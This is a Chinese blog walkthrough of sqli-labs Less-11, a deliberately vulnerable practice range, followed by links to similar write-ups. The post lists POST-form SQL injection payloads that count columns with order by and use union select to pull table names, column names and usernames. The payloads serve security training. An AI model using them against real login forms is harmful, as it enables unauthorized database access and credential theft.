Sqlilabs-11

最新推荐文章于 2023-11-06 22:56:17 发布
最新推荐文章于 2023-11-06 22:56:17 发布
阅读量273 收藏
点赞数
分类专栏: sqlilabs
kaka
本文链接:https://blog.csdn.net/szlg510027010/article/details/107171204
版权

3bcddb4a752d26f1a8c417cea594948.png

从第 11 关开始我们进入了 POST 环节,什么是 POST ,POST 就是数据从客户端提交到服务端,例如在这个关卡中,我们就是将用户名和密码以表单的形式提交给服务器,然后服务器再进行验证。

8c6bbaf2658f91e8c82f06287c203a6.png

如图,在 Hackbar 我们需要构造 uname passwd submit 三样东西,其实这跟我们做的第一关没什么差别,只是换了个地方构造 payload 而已,或者你可以不用 hackbar ,直接在输入框里输入构造 payload 也是可以的。

c95668e36c9562a64c00e7c0c055b08.png

a058239fd51969cd116754e812cb6de.png

这里就以 hackbar 为例构造 payload:
uname=admin' order by 3#&passwd=1&submit=submit
uname=admin' order by 2#&passwd=1&submit=submit

uname=-admin' union select 1,2#&passwd=1&submit=submit

55690c5c54fc69a174c08a5617076cd.png

uname=-admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=submit

aa4fe8ae17f6a23430ff8e8f235d5e1.png

uname=-admin' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name = 'users'#&passwd=1&submit=submit

8dbea83dbbdebdad6fb9c4b29121c07.png

uname=-admin' union select 1,group_concat(username) from users#&passwd=1&submit=submit

7a9f7974996d51dcacab27821e55a19.png

uname=-admin' union select 1,group_concat(username) from users#&passwd=1&submit=submit

219727e6a07eb26fe95abf03a838eba.png

😄

CrAcKeR-1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs 第十一关
weixin_67813445的博客
02-16 286
11关出现登录框,发现是基于post进行的注入,我们可以用burrp suit来进行抓包,也可以选用hackbar的post方式
sqli-labs-----第11
wyzhxhn的博客
11-09 1798
基于错误的POST型单引号字符型注入
sqli-labs关卡11(基于post提交的单引号闭合的字符型注入)通关思路
zyh1588的博客
11-06 569
小白回顾sqli-labs靶场第十一关
sqli-labs第十一关
小人物的博客
06-10 4400
less11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入) 第十一关开始进入登录框这种模式,像登陆框这种模式也是可以当成sql语句注入的,你想想啊,它动态的页面,通过post传递值,然后再将post的值写到sql语句中,按照这个想法,那是不是万能注入也能使呢? 试一试。万能注入的语法为“ ‘or ‘1’ = ...
sqli-labs第11-20关
永远相信美好的事情即将发生
12-15 3821
Less-11 进入后是个登录页面,应该是基于post的注入,这边准备用hackbar注入,方便一点。看一下源码,两个框的名字分别是uname和passwd 先提交1试试效果 登陆失败,再加一个单引号试试,密码框不输(若是输入密码,报错出来的信息更少;也可同时输入单双引号,这个效果一样) 有报错回显,存在注入,且回显的错误为:‘1’’ and password=’’ LIMIT 0,1。其中1’是我输进去的,另外还有成对的单引号出现,可以看出是字符型。由此猜测sql语句为:select usernam
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
SQLi Labs Lesson11
1ame的博客
08-13 454
Lesson-11 POST - Error Based - Single Quotes - String 首先进入欢迎界面 貌似从本节开始学习POST类型的SQL注入。 首先随便尝试登陆。 点击Submit后,结果如图所示。 在username中foo后面加单引号,点击Submit查看结果。 本节是有错误回显的,根据错误回显,发
Sqli-labs——lesson11
weixin_62281892的博客
06-30 814
lesson11
sqli-labs靶场第十一关
gou1791241251的博客
12-27 1339
进入页面后发现是登录框,所以可以尝试一下万能密码或账号,但是万能密码也是需要判断注入闭合方式的,所以与我们之前所做过的盲注是一样的。 由此页面可以看出闭合方式是单引号,所以我们可以使用布尔盲注来进行获取信息啦。。 此时看到显示结果太多了,多于1个,所以可以用limit 0,1来进行获取第一个信息 这里也是可以使用报错注入的哦。。 比如这个xpath报错注入 以下就不在展示信息获取的步骤啦 ...
sqli-labs靶场】第11
qq_61019688的博客
04-26 771
知道了sql语句,接下来就是构造sql语句来进行查询,例如1’ or 1=1#(注意此处不能再使用and来构造恒真语句,因为我们不知道username和password,所以要想判断sql语句是否执行要使用or,这样or后面的语句为true则执行,为false则报错)(还有一个注意点的此处不能再用--+来注释,要使用#)1’ order by 2#,无返回内容,由此可以判断出列数应该是2,对于为啥order by 2无内容返回因为是可能不存在username=1,所以查不到内容。1’ or 1=2#报错。
sqli-labs 11-20关
sy15890481860的博客
02-09 639
sqli-labs 11-20关 Less-11: 从这一关开始就进入了post的世界 进入页面 随便输入出现报错信息 我们在输入框输入万能密码尝试一下admin'or'=1'#,密码随意。返回正确的结果。 详情看上篇文章 Less-12: 闭合方式") Less-13: 闭合方式**’)**。这里可以用下布尔类型的盲注。猜数据库的第一位,然后挨着对每一位进行测试。 Less-14: 双引号闭...
sqli-labs第11~16关【post型:union,报错注入,盲注】
学海无涯苦作舟
09-14 230
11关 单引号闭合型-----id='$id' 之前的10关都是get型,参数会显示在url中,post则需要借助工具,burp或者hackbar等等 1.先对内容进行输入抓包发现有两个参数 2.我们可以猜测一下表中的uname是否有admin 发现我们输入的and 1=1 and 1=2被代入到数据库中执行且存在admin账户(如果admin不存在我们构造payload:x' or 1=1 --+和x' or 1=2 --+进行测试,x可以是任意值) ,如下 3.接下来就是ord..
Sqli-Labs(第11关~第42关)通关笔记
weixin_54894046的博客
11-16 1114
sql注入lesson-11~31
sqli-labs 11-20关
bsaikfhgihwi的博客
02-01 1435
11-20关都为post传递,我们可以用burrp_suit来进行抓包和改包,也可以用hackbar来进行注入。 第十一关 1.寻找闭合方式 先输入1' or 1=1# 发现登录成功 则说明闭合方式为单引号闭合。 2.看有多少个字段 输入-1' order by 3#发现 则说明有两个字段。 3.来使用联合注入爆数据库名,表名,用户。 (1)爆数据库 -1' union select 1,d...
sqli-labs ————less -11(POST注入)
Fly_鹏程万里
05-11 3571
前言从这一关开始,我们就进入到了POST注入的世界了。在接下来的几关中我们将陆续介绍关于POST注入的方法以及技巧。POSTpost是一种数据提交方式,它主要是指数据从客户端提交到服务器端,例如,我们常常使用的用户登录模块、网站的留言板模块等,在这些功能模块中我们提交的数据都是以post的方式提交的服务器的,之后再由服务器端进行验证。Less-11关卡界面:我们首先提交一个admin试试看会有什么...
sqli-labs(11
jimggg的博客
03-20 133
Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入) 熬到零晨2点半,终于把前10题所有的点都理顺了,可以来另一个类型注入了,post 这个最好就要用有名的burp suite 根据题目指引,加个单引号测试一下,果然报错,想办法闭合吧! 果然是由浅入深,看到结果了 ...
Sqlilabs-Less38-
09-23
Sqlilabs-Less38是一个关于SQL注入的实验题目。在这个实验中,你需要通过注入恶意的SQL代码来获取敏感信息或者修改数据库中的数据。 在这个具体的实验中,通过输入一个id参数,我们可以在URL中进行注入。在第一步中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值